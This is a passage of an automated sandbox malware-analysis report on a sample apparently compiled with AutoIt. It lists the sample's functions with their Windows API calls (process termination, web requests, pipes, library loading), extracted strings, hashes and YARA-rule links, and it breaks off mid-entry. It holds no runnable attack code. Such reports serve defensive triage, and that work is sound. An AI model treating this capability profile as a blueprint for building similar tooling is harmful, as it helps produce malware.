                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00177C2C
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00177C3B
                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00177C45
                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00177C4C
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                    • String ID:
                                    • API String ID: 839392675-0
                                    • Opcode ID: 11f40d55b4525eec0eb6827791f82ba206003a666b264427a56d4df574244a1d
                                    • Instruction ID: fa74a3cee4535f9cb09c2711ffc47dd3510896f1e657d47a86e3e1ca23729e82
                                    • Opcode Fuzzy Hash: 11f40d55b4525eec0eb6827791f82ba206003a666b264427a56d4df574244a1d
                                    • Instruction Fuzzy Hash: 58F09072101158BBE7291752AC0DEEF3B7CEFCAB11F000118FA01D1051E7A01A81C6B5
                                    Function 00179A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • InterlockedExchange.KERNEL32(?,?), ref: 00179A33
                                    • RtlEnterCriticalSection.NTDLL(?), ref: 00179A44
                                    • TerminateThread.KERNEL32(?,000001F6,?,?,?,001A5DEE,?,?,?,?,?,0013ED63), ref: 00179A51
                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,001A5DEE,?,?,?,?,?,0013ED63), ref: 00179A5E
                                      • Part of subcall function 001793D1: CloseHandle.KERNEL32(?,?,00179A6B,?,?,?,001A5DEE,?,?,?,?,?,0013ED63), ref: 001793DB
                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00179A71
                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 00179A78
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                    • String ID:
                                    • API String ID: 3495660284-0
                                    • Opcode ID: fbccfed420cbf448b2cd9796620b67767b6b2af6e40e13cfeb09f8fe60ca71ee
                                    • Instruction ID: 9d5dbf17a0c9b1cbd3ef88ef5d124e106e51d1a3b12e4605e96d3afe4ab5c66d
                                    • Opcode Fuzzy Hash: fbccfed420cbf448b2cd9796620b67767b6b2af6e40e13cfeb09f8fe60ca71ee
                                    • Instruction Fuzzy Hash: BEF0E236142201ABD3191BA4FC8DDEF3739FF84301B440261F203918A0EB749880DB50
                                    Function 0018AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                    Download Yara Rule
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 0018B006
                                    • CharUpperBuffW.USER32(?,?), ref: 0018B115
                                    • VariantClear.OLEAUT32(?), ref: 0018B298
                                      • Part of subcall function 00179DC5: VariantInit.OLEAUT32(00000000), ref: 00179E05
                                      • Part of subcall function 00179DC5: VariantCopy.OLEAUT32(?,?), ref: 00179E0E
                                      • Part of subcall function 00179DC5: VariantClear.OLEAUT32(?), ref: 00179E1A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                    • API String ID: 4237274167-1221869570
                                    • Opcode ID: 13562991e2dc04391dc3d7a1af0543f38668022b57a20c6a1543225356ea7fa1
                                    • Instruction ID: 981902f7ad5dd1397a2956a420b45f3e765049f4935fa66ab5559acb429409cb
                                    • Opcode Fuzzy Hash: 13562991e2dc04391dc3d7a1af0543f38668022b57a20c6a1543225356ea7fa1
                                    • Instruction Fuzzy Hash: 889199706083019FCB14EF24D48495ABBF5BF99704F04892DF89A9B362DB31EA05CF92
                                    Function 00175347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0014C6F4: _wcscpy.LIBCMT ref: 0014C717
                                    • _memset.LIBCMT ref: 00175438
                                    • GetMenuItemInfoW.USER32(?), ref: 00175467
                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00175513
                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0017553D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                    • String ID: 0
                                    • API String ID: 4152858687-4108050209
                                    • Opcode ID: b96db6f276cec3b04cb83cad8ab117db67e72c48a0819335a03f95d0465bae12
                                    • Instruction ID: 4a299cb64fe1f3a108ce6c00458c3090bfb500aa7e40ec0356d0d32cdf15d431
                                    • Opcode Fuzzy Hash: b96db6f276cec3b04cb83cad8ab117db67e72c48a0819335a03f95d0465bae12
                                    • Instruction Fuzzy Hash: 5F51F1716047019BD714DB28C8456BBBBFAAB95364F14862DF8AED31A0EBF0CD448B52
                                    Function 00170213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 0017027B
                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 001702B1
                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 001702C2
                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00170344
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                    • String ID: DllGetClassObject
                                    • API String ID: 753597075-1075368562
                                    • Opcode ID: 5c77f40928952f5a92644fe78a24b825c8b492e4c3ebf932ac7ce624c7b1736d
                                    • Instruction ID: ed4dedd1caf972fe80ae2ec21d39a2d685aa1a6680e77a0a2748e87334bc5418
                                    • Opcode Fuzzy Hash: 5c77f40928952f5a92644fe78a24b825c8b492e4c3ebf932ac7ce624c7b1736d
                                    • Instruction Fuzzy Hash: 5C415D71600704EFDB0ACF64C885BAA7BB9FF48314B15C0A9E90D9F246D7B5DA44CBA0
                                    Function 00175007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 00175075
                                    • GetMenuItemInfoW.USER32 ref: 00175091
                                    • DeleteMenu.USER32(00000004,00000007,00000000), ref: 001750D7
                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,001F1708,00000000), ref: 00175120
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Menu$Delete$InfoItem_memset
                                    • String ID: 0
                                    • API String ID: 1173514356-4108050209
                                    • Opcode ID: fee3f12f47c30ef70381efea8087a63455f974ddbd9cf62dbf5adefb6c9cb437
                                    • Instruction ID: e73cdc16cd80f2490db29d7b88140d5dfd69c3e29ac854482ee670b7f56eee5a
                                    • Opcode Fuzzy Hash: fee3f12f47c30ef70381efea8087a63455f974ddbd9cf62dbf5adefb6c9cb437
                                    • Instruction Fuzzy Hash: 9541E3302047019FD724DF28DC85B2ABBF6AF85315F04861EF96997291D7B0E840CB62
                                    Function 0017E698 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0017E742
                                    • GetLastError.KERNEL32(?,00000000), ref: 0017E768
                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0017E78D
                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0017E7B9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                    • String ID: p1Wu`KXu
                                    • API String ID: 3321077145-4063981602
                                    • Opcode ID: a3059f933089f42b5f68119bc186d08ca7d59c5fd4b635f748fa7561ac6528e2
                                    • Instruction ID: eeb9a70c0313f65c0e88a379a0d373b64c429fa7007678a20e6b21e352ba66bb
                                    • Opcode Fuzzy Hash: a3059f933089f42b5f68119bc186d08ca7d59c5fd4b635f748fa7561ac6528e2
                                    • Instruction Fuzzy Hash: 904105396006109FCB15EF25C48594DBBF5BFA9720F198498E94AAB3A2CB70FD408B91
                                    Function 00190567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                    Download Yara Rule
                                    APIs
                                    • CharLowerBuffW.USER32(?,?,?,?), ref: 00190587
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: BuffCharLower
                                    • String ID: cdecl$none$stdcall$winapi
                                    • API String ID: 2358735015-567219261
                                    • Opcode ID: 3f6eb177c14b637f41a99fe3cf14fe04573ff99248f2757c1c796d20d16e1319
                                    • Instruction ID: b06bbfaa193702e856bba163615d025380e83a9162292b83188ac8d417512b92
                                    • Opcode Fuzzy Hash: 3f6eb177c14b637f41a99fe3cf14fe04573ff99248f2757c1c796d20d16e1319
                                    • Instruction Fuzzy Hash: 3E31A270A00616AFCF01EF58CD919EEB3B8FF65314F108629E866A76D1DB71E915CB80
                                    Function 0016B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0016B88E
                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0016B8A1
                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 0016B8D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 3850602802-1403004172
                                    • Opcode ID: ef822a07336a2118367d2f474c4b225530364d8b1c685554190849a356105061
                                    • Instruction ID: 1a605d287bec08f537cc017963383c78fa3490886e639fe8533ef8b11a86ab46
                                    • Opcode Fuzzy Hash: ef822a07336a2118367d2f474c4b225530364d8b1c685554190849a356105061
                                    • Instruction Fuzzy Hash: 2121EF72A00108BFDB18ABA8DC86DFEB77CDF55350F104229F422A71E0EB744D5A9B60
                                    Function 001843E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00184401
                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00184427
                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00184457
                                    • InternetCloseHandle.WININET(00000000), ref: 0018449E
                                      • Part of subcall function 00185052: GetLastError.KERNEL32(?,?,001843CC,00000000,00000000,00000001), ref: 00185067
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                    • String ID:
                                    • API String ID: 1951874230-3916222277
                                    • Opcode ID: a8c06209b1ffd58c697aff179a39955f0ca89550c5002b7255a6efb32d908866
                                    • Instruction ID: bbb004afde656c1bc1af1b08e262ee221b68fba9ea55b88f42b968b13c29216f
                                    • Opcode Fuzzy Hash: a8c06209b1ffd58c697aff179a39955f0ca89550c5002b7255a6efb32d908866
                                    • Instruction Fuzzy Hash: 0921CFB6600209BFE715AF54DC85FBFBAECEB48748F10811AF109A2140EF648E059B70
                                    Function 001990E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0014D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0014D1BA
                                      • Part of subcall function 0014D17C: GetStockObject.GDI32(00000011), ref: 0014D1CE
                                      • Part of subcall function 0014D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0014D1D8
                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0019915C
                                    • LoadLibraryW.KERNEL32(?), ref: 00199163
                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00199178
                                    • DestroyWindow.USER32(?), ref: 00199180
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                    • String ID: SysAnimate32
                                    • API String ID: 4146253029-1011021900
                                    • Opcode ID: 67afed0f99068c6c4ccd77f066c34404aceb5502b21dbd723b1de3865f9a17a2
                                    • Instruction ID: 316455aceec2fc2a8f8af468338fc852c6ca6ea002ee61f7d8f2de1fc7a85a06
                                    • Opcode Fuzzy Hash: 67afed0f99068c6c4ccd77f066c34404aceb5502b21dbd723b1de3865f9a17a2
                                    • Instruction Fuzzy Hash: 69219D71200206BBEF204E69DC89EBA37ADFF99374F10062DF914961A0D772DC51A761
                                    Function 00179568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetStdHandle.KERNEL32(0000000C), ref: 00179588
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001795B9
                                    • GetStdHandle.KERNEL32(0000000C), ref: 001795CB
                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00179605
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CreateHandle$FilePipe
                                    • String ID: nul
                                    • API String ID: 4209266947-2873401336
                                    • Opcode ID: 6d941fe4b52bb8eb6a5e091893ee547607d6e26e293301007d44c4157f17b1be
                                    • Instruction ID: 598b85bb9e3beddd85b187f1b9fdc4b904e6c8a68069b5397d85c58bf0d56240
                                    • Opcode Fuzzy Hash: 6d941fe4b52bb8eb6a5e091893ee547607d6e26e293301007d44c4157f17b1be
                                    • Instruction Fuzzy Hash: 6D219270500216ABDB259F25DC05A9E7BF4AF55724F208A1AF8A9D72D0D770D948CB10
                                    Function 00179634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetStdHandle.KERNEL32(000000F6), ref: 00179653
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00179683
                                    • GetStdHandle.KERNEL32(000000F6), ref: 00179694
                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 001796CE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CreateHandle$FilePipe
                                    • String ID: nul
                                    • API String ID: 4209266947-2873401336
                                    • Opcode ID: 3888603d60686142553fb94b72a817d51a10f7c574459406defa2d7857ca8407
                                    • Instruction ID: fcd1ff260c48d6f86fa46ea7635970859d2ef03d8136d8fa7f7acb1afa4eb6c9
                                    • Opcode Fuzzy Hash: 3888603d60686142553fb94b72a817d51a10f7c574459406defa2d7857ca8407
                                    • Instruction Fuzzy Hash: F121C2716002069BDB249F699C05E9EB7F8AF54734F208B18FCA5E72D0E770D889CB50
                                    Function 0017DAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 0017DB0A
                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0017DB5E
                                    • __swprintf.LIBCMT ref: 0017DB77
                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,001CDC00), ref: 0017DBB5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ErrorMode$InformationVolume__swprintf
                                    • String ID: %lu
                                    • API String ID: 3164766367-685833217
                                    • Opcode ID: 88876973c6fc538327b26af382ec1f78de1e4c60133470e5084051e0a42c711e
